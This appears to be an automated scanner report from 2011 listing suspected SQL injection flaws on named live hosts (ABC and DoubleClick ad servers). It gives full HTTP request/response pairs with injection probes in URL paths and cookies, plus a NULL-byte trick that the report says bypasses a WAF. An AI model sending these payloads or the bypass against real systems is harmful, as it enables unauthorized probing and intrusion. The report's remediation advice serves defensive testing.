28.80. http://www.aradial.com/images/bg.gif
28.81. http://www.att.com/media/en_US/images/ico/ico_security_AA0009X7.jpg
28.82. http://www.att.com/navservice/navservlet
28.83. http://www.att.com/u-verse/dwr/interface/DWRRequestManager.js
28.84. http://www.bostonherald.com/news/includes/twitter.inc
28.85. http://www.cpanel.net/images/logo.jpg
28.86. https://www.easynews.com/signup/lookit.phtml
28.87. http://www.giganews.com/favicon.ico
28.88. https://www.giganews.com/favicon.ico
28.89. http://www.ibm.com/developerworks/dwtagg/css/h3/dogear.css
28.90. http://www.ibm.com/developerworks/dwtags/dwjquerytabtags
28.91. http://www.ibm.com/developerworks/java/inc/author-module.inc
28.92. http://www.ibm.com/developerworks/tagging/UseCaseServlet
28.93. http://www.ibm.com/developerworks/utils/ratingJSON.jsp
28.94. http://www.mailjet.com/ajax/home/emailLiveCounter
28.95. http://www.mokafive.com/highslide/graphics/zoomin.cur
28.96. http://www.mokafive.com/highslide/graphics/zoomout.cur
28.97. http://www.mokafive.com/images/mokafive_favicon.ico
28.98. http://www.open.com.au/favicon.ico
28.99. https://www.open.com.au/favicon.ico
28.100. http://www.radius-server.net/images/bg.gif
28.101. http://www.radius-server.net/images/logo.gif
28.102. http://www.radius-server.net/images/sm-adv.gif
28.103. http://www.radius-server.net/images/telelogo.gif
28.104. http://www.radius.cistron.nl/README.pam
28.105. http://www.thundernews.com/favicon.ico
28.106. https://www.thundernews.com/favicon.ico
28.107. http://www.usenetbinaries.com/favicon.ico
28.108. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp
28.109. http://www.westhost.com/favicon.ico
29. Content type is not specified
29.1. http://3ps.go.com/DynamicAd
29.2. http://ad.yieldmanager.com/st
29.3. http://ads.bluelithium.com/st
29.4. http://traffic.outbrain.com/network/redir
29.5. http://www.meebo.com/cmd/btproviders
29.6. http://www.meebo.com/cmd/tc
30. SSL certificate
1. SQL injection
next
There are 40 instances of this issue:
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:- One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
- Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://a.abc.com/service/sfp/omnitureconfig/ [REST URL parameter 1]
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://a.abc.com |
| Path: |
/service/sfp/omnitureconfig/ |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 97170536'%20or%201%3d1--%20 and 97170536'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /service97170536'%20or%201%3d1--%20/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angels HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 1
HTTP/1.1 302 Moved Temporarily
Content-Length: 163
Location: http://abc.go.com/error
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed01
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 17 Sep 2011 01:03:35 GMT
Connection: close
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://abc.go.com/error
">http://abc.go.com/error
</A>.<BODY></HTML> |
Request 2
GET /service97170536'%20or%201%3d2--%20/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angels HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 17 Sep 2011 01:03:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed08
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 01:08:35 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Content-Length: 0
Cache-Control: max-age=300
Date: Sat, 17 Sep 2011 01:03:38 GMT
Connection: close
|
1.2. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10 [id cookie]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://ad.doubleclick.net |
| Path: |
/adi/N884.abc.com/B5709785.10 |
Issue detail
The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00'
|
Response 1
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7358
Set-Cookie: id=c81da3c3c0000be||t=1316221599|et=730|cs=002213fd4807e2941091f2164a; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:06:39 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:06:39 GMT
Date: Sat, 17 Sep 2011 01:06:39 GMT
Expires: Sat, 17 Sep 2011 01:06:39 GMT
Cache-Control: private, max-age=300
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Jan 27 16:06:44 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...
ash"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...
|
Request 2
GET /adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00''
|
Response 2
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1667
Set-Cookie: id=c91da3c3c000047||t=1316221600|et=730|cs=002213fd48f445365653400eb4; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:06:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:06:40 GMT
Date: Sat, 17 Sep 2011 01:06:40 GMT
Expires: Sat, 17 Sep 2011 01:06:40 GMT
Cache-Control: private, max-age=300
<script type="text/javascript">
var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/f/8b/%2a/i%3B243805900%3B1-0%3B0%3B67516235%3B3454-728/90%3B42127629/42145416/1%3B
...[SNIP]...
|
1.3. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://ad.doubleclick.net |
| Path: |
/adj/tmz.toofab.wb.dart/ |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adj/tmz.toofab.wb.dart/;pos=atf;boxad=1;syncad=yes;tile=1;dcopt=ist;sz=728x90,970x66;qcseg=D;ord=9367342558689416&1%00'=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT
|
Response 1
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6149
Set-Cookie: id=cfbdc3c3c000003||t=1316221750|et=730|cs=002213fd486089af9086817dd8; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:09:10 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:09:10 GMT
Date: Sat, 17 Sep 2011 01:09:10 GMT
Expires: Sat, 17 Sep 2011 01:09:10 GMT
Cache-Control: private
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Sep 08 17:56:44 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...
|
Request 2
GET /adj/tmz.toofab.wb.dart/;pos=atf;boxad=1;syncad=yes;tile=1;dcopt=ist;sz=728x90,970x66;qcseg=D;ord=9367342558689416&1%00''=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT
|
Response 2
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 767
Set-Cookie: id=ce3dc3c3c000038||t=1316221751|et=730|cs=002213fd48f22ac6f4531511ae; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:09:11 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:09:11 GMT
Date: Sat, 17 Sep 2011 01:09:11 GMT
Expires: Sat, 17 Sep 2011 01:09:11 GMT
Cache-Control: private
document.write('<script src=\"http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2105173&PluID=0&w=728&h=90&ord=1802222&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/j%3B
...[SNIP]...
|
1.4. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://adsatt.abc.starwave.com |
| Path: |
/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad'%20and%201%3d1--%20/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>
</TD></TR></TABLE></BODY></HTML>
|
Request 2
GET /ad'%20and%201%3d2--%20/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
|
1.5. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://adsatt.abc.starwave.com |
| Path: |
/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif |
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad/sponsors'%20and%201%3d1--%20/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>
</TD></TR></TABLE></BODY></HTML>
|
Request 2
GET /ad/sponsors'%20and%201%3d2--%20/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
